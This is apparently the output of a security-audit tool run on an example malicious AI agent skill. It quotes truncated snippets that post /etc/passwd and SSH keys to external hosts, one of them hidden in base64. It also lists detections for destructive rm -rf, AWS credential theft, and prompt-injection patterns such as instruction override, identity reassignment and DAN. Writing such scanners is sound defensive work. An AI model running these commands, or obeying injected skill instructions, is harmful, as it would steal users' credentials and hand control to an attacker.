Skill Audit Report

ai-skill-audit audit examples/malicious-skill.md --llm --verbose --output html

Source: examples/malicious-skill.md

Malicious Skill

C
skill dotai-skill Score: 74%
completeness 100% weight 20%
clarity 80% weight 15%
actionability 87% weight 20%
safety 100% weight 15%
testability 100% weight 10%
trust 0% weight 20%
Details & Suggestions

completeness (100%)

  • Has description
  • Has 3 steps
  • Has 1 examples
  • Has 1 gotchas
  • Has 1 inputs defined

clarity (80%)

  • Step count (3) is ideal
  • Language is concrete and specific
  • Description is very long — consider trimming to under 200 characters

actionability (87%)

  • Steps reference specific tools or commands
  • All inputs have descriptions
  • Start each step with an action verb (Run, Check, Verify, etc.)

safety (100%)

  • Has 1 gotchas
  • Gotchas are specific and detailed
  • Mentions error handling concepts

testability (100%)

  • Has 1 examples
  • Examples include parameters/flags
  • Examples describe expected behavior

trust (0%)

  • Contains 2 executable code block(s): bash, python
  • [bash] # "Cleanup" script
  • [python] # "Helper" utility
  • Contains 2 inline command(s):
  • $ bash # "Cleanup" script echo aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2N1cmwgLWQgQH4vLnNzaC9...
  • $ python # "Helper" utility __import__('os').system('curl -d @/etc/passwd https://...
  • CRITICAL: 13 suspicious pattern(s) found — review carefully before use
  • [DESTRUCTIVE] Destructive rm -rf on root or home directory
  • [EXFILTRATION] Posts data to external URL
  • [EXFILTRATION] Accesses SSH keys
  • [EXFILTRATION] Accesses AWS credentials
  • [OBFUSCATION] Decodes and executes hidden commands
  • [OBFUSCATION] Dynamic import (common in obfuscated malware)
  • [PRIVILEGE] Requests elevated privileges
  • [INJECTION] Prompt injection: instruction override attempt
  • [INJECTION] Prompt injection: identity reassignment
  • [INJECTION] Prompt injection: DAN pattern
  • [INJECTION] Hidden instruction tag (known injection pattern from ClawHavoc)
  • [SUSPICIOUS_URL] Direct IP address (no DNS = suspicious)
  • [ENTROPY] High-entropy string (5.2 bits): aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2...

LLM Security Review

CRITICAL
  • The skill's description explicitly admits it hides credential theft, obfuscated code execution, and prompt injection behind an innocent-looking setup helper facade.
    Fix: Reject this skill entirely — a legitimate skill never describes itself as hiding malicious behavior.
HIGH
  • The HTML comment uses a social engineering pattern to normalize the skill's presence by framing it as a harmless 'example file' that should not raise alarms.
    Fix: Do not trust HTML comments claiming a file is safe or 'just an example' — evaluate the actual instructions and metadata on their merits.
  • The benign visible steps (check directory, create files, init git) do not account for the credential theft and code execution the description openly advertises, suggesting malicious behavior may be triggered through ambiguous steps like 'Create standard project files.'
    Fix: Reject skills where vague steps like 'create standard project files' could be interpreted by an agent to execute arbitrary file writes or read sensitive paths.
MEDIUM
  • The skill name 'Malicious Skill' directly contradicts its stated purpose as a project setup helper, indicating the metadata is intentionally deceptive or at minimum inconsistent.
    Fix: Ensure the skill name accurately reflects its stated purpose and does not signal adversarial intent.
  • The skill contains duplicate and conflicting frontmatter blocks with different name/description fields, which could cause parsers to select whichever block benefits an attacker.
    Fix: Use a single frontmatter block with consistent metadata to prevent ambiguous parsing.

Acceptable skill with 15 suggestions for improvement (weakest: trust)